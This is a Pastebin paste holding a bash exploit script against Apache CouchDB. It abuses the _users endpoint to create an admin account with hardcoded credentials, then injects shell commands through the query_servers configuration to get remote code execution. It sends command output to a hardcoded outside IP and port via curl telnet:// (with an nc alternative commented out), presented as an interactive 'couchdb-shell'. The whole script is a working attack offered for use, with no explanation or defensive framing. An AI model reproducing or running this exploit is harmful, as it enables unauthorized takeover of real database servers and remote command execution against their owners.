Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- if [ $# -ne 1 ]; then
- echo "$0 <SERVER_URL>"
- exit 1
- fi
- NETCAT_LISTEN="198.27.66.144"
- NETCAT_PORT="3422"
- USER="couchdb"
- PASS="iy6685i"
- RANDB="god4"
- RANDOC="ok"
- CMD="|timeout 2 curl telnet://$NETCAT_LISTEN:$NETCAT_PORT"
- #CMD="|nc $NETCAT_LISTEN $NETCAT_PORT"
- V=$(curl -s $1 | jq -r '.version')
- echo Version: $V
- VERSION=$(echo $V |sed 's/\.//g')
- curl -X PUT $1/_users/org.couchdb.user:$USER -d '{"type": "user","name": "'$USER'","roles": ["_admin"],"roles": [],"password": "'$PASS'"}' --insecure
- if [ "$VERSION" -gt "171" ]
- then
- curl -s -L $1/_membership --user $USER:$PASS --insecure | jq -r '.all_nodes[0]'
- node=$(curl -s -L $1/_membership --user $USER:$PASS --insecure | jq -r '.all_nodes[0]')
- if [ ! "$node" == "" ]
- then
- echo NODE: $node
- fi
- elif [ "$VERSION" -gt "210" ]
- then
- echo Version not vuln
- exit
- fi
- #curl -X PUT $1/_node/$node/_config/admins/$USER -d '"'$ADMINPASS'"' --user $USER:$PASS --insecure # create second admin
- curl -s -L -X PUT $1/$RANDB --user $USER:$PASS --insecure | jq -r '.reason'
- if [ "$VERSION" -lt "171" ]
- then
- curl -s -L -X PUT $1/$RANDB/$RANDOC -d '{"_id":"967a00dff5e02add41819138abb3284d"}' --user $USER:$PASS --insecure | jq -r '.reason'
- fi
- while true; do
- echo -n "couchdb-shell@$1> "
- read INPUT
- if [ "$INPUT" == "clear" ]
- then
- printf "\033c"
- elif [ "$INPUT" == "exit" ]
- then
- exit
- else
- random=up$(( $RANDOM % 10000 + 40000 ));
- if [ "$VERSION" -gt "171" ]
- then
- echo $INPUT $CMD | xargs -I % curl -s -o /dev/null -X PUT $1/_node/$node/_config/query_servers/$random -d '"%"' --user $USER:$PASS --insecure
- curl -s -o /dev/null -X PUT $1/$RANDB/_design/zero -d '{"_id": "_design/zero", "views": {"'$RANDB'": {"map": ""} }, "language": "'$random'"}' --user $USER:$PASS --insecure | timeout 2 nc -l $NETCAT_PORT
- curl -s -o /dev/null -X DELETE $1/_node/$node/_config/query_servers/$random --user $USER:$PASS --insecure
- elif [ "$VERSION" -lt "211" ]
- then
- echo $INPUT $CMD | xargs -I % curl -s -o /dev/null -X PUT $1/_config/query_servers/$random -d '"%"' --user $USER:$PASS --insecure
- curl -s -o /dev/null -X POST $1/$RANDB/_temp_view?limit=11 -d '{"language":"'$random'","map":""}' --user $USER:$PASS --insecure -H "Content-Type: application/json" | timeout 2 nc -l $NETCAT_PORT
- curl -s -o /dev/null -X DELETE $1/_config/query_servers/$random --user $USER:$PASS --insecure
- fi
- fi
- done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement